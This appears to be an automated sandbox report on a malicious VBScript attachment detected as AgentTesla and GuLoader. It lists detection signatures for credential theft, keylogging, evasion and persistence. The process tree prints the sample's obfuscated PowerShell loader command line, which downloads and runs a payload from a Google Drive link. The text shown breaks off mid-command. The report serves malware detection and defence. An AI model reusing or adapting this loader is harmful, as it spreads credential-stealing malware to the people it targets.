Edit tour
Windows
Analysis Report
TRANSPORT_INSTRUCTION_MR.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4296 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\TRANS PORT_INSTR UCTION_MR. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - WmiPrvSE.exe (PID: 2228 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 3596 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Riffelga nge = 1;$A uthorish=' Substrin'; $Authorish +='g';Func tion Shock head($Kapu tt){$Spise frikvarter ernes=$Kap utt.Length -$Riffelga nge;For($R atihabumr= 5; $Ratiha bumr -lt $ Spisefrikv arterernes ; $Ratihab umr+=(6)){ $Udsagnsle ddenes+=$K aputt.$Aut horish.Inv oke($Ratih abumr, $Ri ffelgange) ;}$Udsagns leddenes;} function s abotage($V elal){& ($Tanqueli nian) ($Ve lal);}$Gre enheart=Sh ockhead 'O utraMIndow oAigrezBes toiSkspolM usikl ,uts a Brne/Gr. nd5.itin.A fdel0Up,ai Zw ng(Syn apWNjereiC oresnD,ags dTosdeoHer rgwkroe sb il,e .rune NStrafTPra ec Forma1M yoli0The,m . Bort0Opf i,;Enkel A rch,WIrrad iObsern Ky st6.odra4B anju; eval For axUdb an6Czare4S pat ;under TayerrUnd ,iv tred:M .ckb1Jacqu 2Maime1 Se ri.Deesk0A llop) Brad BeregGHem odeSalewc DiskkRandm oVolit/ Qu z2 Kruk0F o.nu1Ordfo 0 enio0,an lo1jetst0I nvas1Gaska Knif.FS c riiRgerirG illyeStrid f Toitovex dex.nnek/G ener1Orke. 2minst1Bo. it. ,eha0D ia,o ';$Fe line=Shock head 'Stri pUOverts P oliegalehr Osobe-Fora aASkinkgOm giveEnwinn Sanc tJinr i ';$ostle r=Shockhea d 'goo,whK vikkt Niko t ousp uds tsNemme:Ha dw/Tjles/ GorvadAnti prChivei S ie.vKontre Dansk.Fell ygPrivaoP eezoViolig B,dflAmpe leO var.Is ospcSubtro MowbumJack e/Tilbau V ictcOpsge? RibboeTurp .xI,prgpTe levoHofchr havait pak k= Nurtdbe arloTrevew PutnanFu,i ll.resuoex tena Spird Se vi& Sun diHistodMa nja= Allo1 FrugthEnch eJ estyNym phvNucl ga ppasAA nin V U.pebPoa chPUgtetJJ ol,e7 .eww 5Lob.tW Ty phNEndomnA nalyYharme m AliqHadv env Al ypT urnuQGener DKropskNy. tiE.nobs9 WindK Beun TMon sfapo loZDisozPS nesksAfvae kInte ';$O lympier=Sh ockhead 'D et r>R dio ';$Tanque linian=Sho ckhead 'Su ccei,nacke FascixCiv l ';$Amino benzamide = Shockhea d 'PreloeF orcec Fili hGuelpoNon e. B cki%B ,ahmainter pInserpBru nldUd rmaA nd.lt Karb aAquar% Br i.\ kattPB lodrrIndho e MonahNav ,ea,egists tr,irmocam e B lldAfs ky.Unc.vFD omsfiJav.l dRevi Oc. i&Stnne&Ch rys Skrine OvercHend ehMelleoDm ,ni Tritu$ sept ';sa botage (Sh ockhead 'B igba$Storh g R,tilTri m oUnadvb DissaSamm. lCr,nk: Ce coAForemaK i,kenUnfle dSportePsy chlToledyB ramsdTan e eNrga nSma afs Exce=r otte(T.skn cB dummval erdDelib D emat/Inaud cBiogr Fa el$WretcAn ormam Fors iEnneanmid nio ColebU nexteKlone n undsz Sk umaBevilmT vrf i Dest dFlexueB,l im)Adnot ' );sabotage (Shockhea d 'Form.$W ienegPal.n lAlleyobal lobEnedia BlgelStyre :ExpouUSch oon,mbets EngahLydli u Hel.nK.t ukn.kraleU n.erdAlcoh =Overf$,iu rooNaticsK ,loltDimpl l S,mieDan n rforgl.O plgns omin p Dubblafg rsiGangat alsr(U orb $musheOGl. cilOrdney nordmTeori p iploi,ym pae HeltrB eta )Fresn ');$ostle r=$Unshunn ed[0];sabo